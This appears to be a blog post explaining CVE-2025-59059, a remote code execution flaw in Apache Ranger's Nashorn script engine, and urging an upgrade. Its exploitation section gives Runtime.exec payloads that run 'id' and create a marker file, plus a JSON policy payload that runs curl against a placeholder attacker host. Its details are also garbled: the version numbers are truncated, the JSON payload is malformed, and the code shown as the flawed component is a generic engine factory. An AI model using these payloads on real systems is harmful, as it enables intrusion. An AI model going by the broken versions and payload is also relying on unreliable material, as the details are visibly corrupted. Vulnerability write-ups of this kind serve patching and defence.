A critical vulnerability, tracked as CVE-2025-59059, was discovered in the Apache Ranger project, specifically within the NashornScriptEngineCreator component. This Remote Code Execution (RCE) flaw affects all Apache Ranger versions up to and including 2.7.. If you are running one of these vulnerable versions, it is highly recommended to upgrade to Ranger 2.8., which patches the vulnerability.
In this post, we'll break down what went wrong, how attackers can exploit this issue, look at some code, and how you can protect your systems.
What is Apache Ranger?
Apache Ranger provides comprehensive security for data access across the Apache Hadoop ecosystem. It delivers centralized authentication, authorization, and auditing solutions for Hadoop, Hive, HBase, and more. Ranger allows administrators to define and enforce security policies for various data sources.
Vulnerability Details
NashornScriptEngineCreator provides scripting capabilities by integrating the Nashorn JavaScript engine. Under certain configurations, it does not properly sanitize code that is passed to it, allowing remote attackers to inject and execute arbitrary JavaScript, which in turn can execute arbitrary Java code.
Exploitable Component
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
public class NashornScriptEngineCreator {
public ScriptEngine create() {
ScriptEngineManager manager = new ScriptEngineManager();
return manager.getEngineByName("nashorn");
}
}
In vulnerable versions, code passed to scripts via a REST endpoint or in policy conditions can manipulate the script engine, leading to arbitrary code execution.
How Attackers Can Exploit CVE-2025-59059
Suppose Ranger is configured to evaluate custom JavaScript expressions via exposed endpoints (such as policy condition evaluation). Malicious users can input specially crafted scripts.
Example Attack Payload
The following Nashorn script, inserted into a policy condition, triggers Java code execution.
var p = java.lang.Runtime.getRuntime().exec("id");
If this payload is evaluated, the backend Java process will execute the OS id command, returning user information. Attackers can chain such commands for further exploitation, including deploying web shells, stealing credentials, or pivoting across systems.
Let's see what a simplified exploit might look like in JavaScript
// Exploiting Nashorn to execute OS commands
var process = java.lang.Runtime.getRuntime().exec('touch /tmp/ranger_compromised');
When this is passed to a vulnerable Ranger setup, the server will create a file at /tmp/ranger_compromised—demonstrating full code execution.
Imagine posting the following JSON to the policy API
{
"conditions": [
{
"type": "custom",
"script": "java.lang.Runtime.getRuntime().exec(\"curl http://attacker-server/pwned\";)"
}
]
}
If the server is vulnerable, it will fetch the attacker's URL, showing remote command execution is possible.
References
- NVD – CVE-2025-59059 *(link may be updated upon official registration)*
- Apache Ranger Security Advisories
- JDK Nashorn Documentation
How to Fix
Upgrade immediately to Apache Ranger 2.8., which completely disables unsafe script evaluation and adds strict input controls.
Conclusion
CVE-2025-59059 is serious: it allows remote, unauthenticated code execution, which can lead to full system compromise. If you're using Apache Ranger 2.7. or earlier, upgrade to 2.8. immediately. There is no safe workaround short of disabling scripting altogether.
Be proactive. Stay secure.
For more details and updates, check the official Apache Ranger Security Page.
Timeline
Published on: 03/03/2026 10:44:47 UTC
Last modified on: 03/03/2026 15:16:15 UTC